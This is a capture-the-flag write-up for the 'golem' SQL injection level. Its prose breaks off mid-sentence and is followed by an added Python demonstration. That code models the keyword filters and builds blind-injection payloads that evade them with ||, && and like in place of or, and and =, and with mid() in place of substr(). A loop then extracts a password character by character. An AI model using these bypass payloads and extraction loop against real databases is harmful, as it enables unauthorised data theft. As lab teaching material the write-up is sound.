[LOS] Golem Writeup (11)

Looking at the 11th problem, "golem", the input goes through two validation steps:

if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");

Looking at the strings being filtered, the commonly used operators "or", "and" and "=" are blocked, and so is "substr", the function used to slice a string one character at a time in a blind injection. Both patterns carry the /i flag, so changing the case of these keywords does not help. In the previous level it was enough to substitute replacements for the or and and operators, but here the substr function has to be bypassed as well, so this one is a bit trickier. $query = "select pw from prob_golem where id..
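As an added illustration (not code from the original post or from the challenge itself), the following Python models the two preg_match() filters above and shows the kind of blind probes that get past them: || in place of or, && in place of and, like in place of =, and mid() in place of substr(). Those substitutions assume MySQL semantics under the default sql_mode; the single-quoted query shape, the hex alphabet and the simulated oracle (a stand-in for the real page, answering only the two probe shapes built here) are assumptions for the demonstration.

```python
import re

# The two preg_match() filters from the golem challenge, modelled with Python's
# re module. PHP's /i flag becomes re.IGNORECASE; the patterns are copied as-is.
# Note that \(\) in the first pattern only matches a literal "()" pair, so a
# call such as mid(pw,1,1) is not caught by it.
NO_HACK = re.compile(r'prob|_|\.|\(\)', re.IGNORECASE)
HEHE = re.compile(r'or|and|substr\(|=', re.IGNORECASE)


def filter_verdict(pw):
    """Mirror the challenge: return the exit() message that fires, or 'pass'."""
    if NO_HACK.search(pw):
        return "No Hack ~_~"
    if HEHE.search(pw):
        return "HeHe"
    return "pass"


def length_probe(n):
    """Boolean probe: is admin's pw exactly n characters long?
    Assumes MySQL: || is OR and && is AND in the default sql_mode, `like`
    without wildcards behaves like equality, and # comments out the rest."""
    return f"' || id like 'admin' && length(pw) like '{n}'#"


def char_probe(pos, ch):
    """Boolean probe: is character `pos` (1-based) of admin's pw equal to ch?
    mid() is MySQL's synonym for substr() that the second filter does not list."""
    return f"' || id like 'admin' && mid(pw,{pos},1) like '{ch}'#"


def extract_password(oracle, alphabet="0123456789abcdef", max_len=32):
    """Blind extraction loop. oracle(pw_param) returns True when the page
    reports a hit for admin. Every probe is checked against the filters first,
    so a blocked payload fails loudly instead of silently returning False.
    The hex alphabet is an assumption; widen it if no character ever hits."""
    length = None
    for n in range(1, max_len + 1):
        probe = length_probe(n)
        assert filter_verdict(probe) == "pass", probe
        if oracle(probe):
            length = n
            break
    if length is None:
        raise ValueError("no length hit; raise max_len")
    found = []
    for pos in range(1, length + 1):
        for ch in alphabet:
            probe = char_probe(pos, ch)
            assert filter_verdict(probe) == "pass", probe
            if oracle(probe):
                found.append(ch)
                break
        else:
            raise ValueError(f"no hit at position {pos}; widen the alphabet")
    return "".join(found)


def make_simulated_oracle(secret):
    """Constructed stand-in for the challenge page: answers the two probe
    shapes above the way MySQL would for an admin row whose pw is `secret`.
    LIKE is case-insensitive under MySQL's default collation, so the character
    comparison is too. Test double only; it does not parse arbitrary SQL."""
    len_re = re.compile(r"length\(pw\) like '(\d+)'")
    mid_re = re.compile(r"mid\(pw,(\d+),1\) like '(.)'")

    def oracle(pw_param):
        m = len_re.search(pw_param)
        if m:
            return len(secret) == int(m.group(1))
        m = mid_re.search(pw_param)
        if m:
            pos, ch = int(m.group(1)), m.group(2)
            return pos <= len(secret) and secret[pos - 1].lower() == ch.lower()
        return False

    return oracle


if __name__ == "__main__":
    for sample in ["' or 1=1#", "substr(pw,1,1)", "prob_golem",
                   "' || id like 'admin'#", "mid(pw,1,1)"]:
        print(f"{sample!r:28} -> {filter_verdict(sample)}")
    # "c0ffee12" is a constructed secret, not the challenge's real password.
    print(extract_password(make_simulated_oracle("c0ffee12")))
```

Against the live challenge the oracle would be a function that sends the pw parameter in a GET request and returns whether the response contains the success marker; the probe builders and the filter check stay the same. Because `like` compares case-insensitively, the extracted string is the lowercase form of the password, which is why a lowercase hex alphabet is enough when the stored value is hex.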
